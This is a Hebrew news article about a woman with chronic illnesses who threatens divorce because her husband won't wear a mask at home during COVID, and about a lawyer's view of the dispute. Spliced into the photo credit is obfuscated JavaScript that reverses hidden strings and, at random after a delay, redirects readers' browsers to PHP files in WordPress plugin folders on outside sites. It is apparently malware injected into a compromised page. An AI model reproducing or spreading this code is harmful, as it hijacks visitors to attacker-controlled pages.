fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

ימי קורונה: הבעל מסרב לעטות מסכה בבית, האישה מבקשת להתגרש

האישה, שסובלת ממחלות רקע שונות המעמידות אותה בסיכון, טוענת שסירובו של בעלה לעטות מסכה גם בבית מסכן אותה בחשיפה לנגיף הקורונה. עו"ד סולן הבהירה לה שדרישתה מעט מוגזמת
צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

נגיף הקורונה, מתברר, מעמיד גם מבחנים קשים בין בני זוג. במקרה הזה, שהגיע לשולחנה של עו"ד שרין סולן, מדובר בבני הזוג שנשואים כבר 17 שנים. האישה עובדת בנק והבעל בעליה של חנות קטנה לממכר מזון. לבני הזוג שני ילדים, ועכשיו הם מאיימים האחד על השנייה בגירושים. העילה למריבות הבלתי פוסקות נעוצה במסכה שנועדה להפחית את הסיכון להידבק בקורונה.

בפנייתה לעו"ד שרין סולן, מציינת האישה, כי היא סובלת משורה ארוכה של מחלות רקע. "למרות גילי הצעיר, יחסית, 42, אני סובלת מסוכרת קשה, לחץ דם ומחלות נוספות, ואני עונה להגדרה של אדם עם מחלות רקע, מחלות שמעמידות אותי בסכנה במקרה ואדבק בנגיף הקורונה".

גירושים בימי קורונה. עו"ד שרין סולן | צילום: יח"צ
גירושים בימי קורונה. עו"ד שרין סולן | צילום: יח"צ

האישה הוסיפה, כי לאחרונה הובהר לה על יד רופא המשפחה, כי עליה להישמר ולעטות מסכה כל העת ולא להתקרב לאנשים אחרים בלי מסכה. יתרה מכך, נאסר עליה להיפגש עם הוריה או חברים והיא צריכה להימנע מכל קרבה.

לדברי האישה, בשבועיים האחרונים, לאור מצבה הרפואי, ביקשה מבעלה שיעטה מסכה גם כשהוא בבית.

האישה לעו"ד סולן: "הוא מסרב בטענה שבעבודתו הוא נאלץ לשים כמעט כל היום את המסכה, וכשהוא מגיע הביתה הוא רוצה קצת להתאוורר".

בני הזוג נשלחו ליישוב סכסוך, לא לפני שעו"ד שרין סולן הבהירה לאישה, כי הדרישה שלה מעט מוגזמת וזו אינה סיבה להתגרש.

בני הזוג הופנו גם ליועץ זוגי שהמליץ להם לנוע בבית בחדרים נפרדים ולחלוק את הטיפול בילדים באופן שווה לפי ימים. "אני אתן לו צ'אנס עוד שבוע אחד. אם הוא לא יעטה מסכה, אני עוזבת את הבית ושיישאר עם הילדים", הבהירה האישה לעו"ד סולן.

חדשות נוספות

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות